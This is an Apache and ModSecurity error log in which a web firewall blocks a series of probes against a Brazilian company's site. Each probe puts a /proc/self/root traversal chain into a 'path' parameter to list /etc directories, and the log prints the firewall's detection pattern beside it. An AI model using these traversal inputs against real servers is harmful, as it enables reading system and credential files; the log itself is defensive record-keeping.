[Fri Mar 20 04:05:26.643273 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:34942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxtta6ubjKNq_cu4aiiQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:31.142051 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.243.128:34952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxuwF0L0L-SsrnPo47hQAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:32.474978 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:59368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxvNa6ubjKNq_cu4aiiwAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:33.759426 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:59376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxvda6ubjKNq_cu4aijgAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:36.101167 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:59382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxwPXLqtnMIWvjpaJsqQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:37.358290 2026] [mime_magic:error] [pid 11167:tid 140411658000128] (70014)End of file found: [client 57.141.18.3:58866] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 04:05:37.367420 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:59384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxwQF0L0L-SsrnPo47iAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:38.109703 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.241.31:51136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxwl1pVZ5mVmJwsFMEnwAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:05:39.847054 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:59396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxwzJ3M9BSuKP7CAbkAAAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:40.420975 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.241.31:46860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxxAF0L0L-SsrnPo47iwAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:05:41.174823 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:53900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxxRCii7xarUs8iHY4TgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:43.506506 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:53912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxxzJ3M9BSuKP7CAbkBQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:44.852210 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:53920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxyPXLqtnMIWvjpaJsswAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:46.219434 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.243.128:53928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxygF0L0L-SsrnPo47jQAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:47.495013 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:53940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxy_XLqtnMIWvjpaJstgAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:49.074157 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:46868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxy_XLqtnMIWvjpaJstwAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:05:50.211508 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:53942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxzrninkcc-iUj5AoxIQAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:51.690763 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:41166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxzzJ3M9BSuKP7CAbkFwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:54.156647 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:41178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx0TJ3M9BSuKP7CAbkHQAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:05:56.982061 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.243.128:41194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx07ninkcc-iUj5AoxIwAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:00.321646 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:41198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx2PHIg5MgXLBnicPO2gAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:01.905832 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:50618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx2QF0L0L-SsrnPo47lQAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:06:07.063959 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:50624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzx3rninkcc-iUj5AoxKwAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
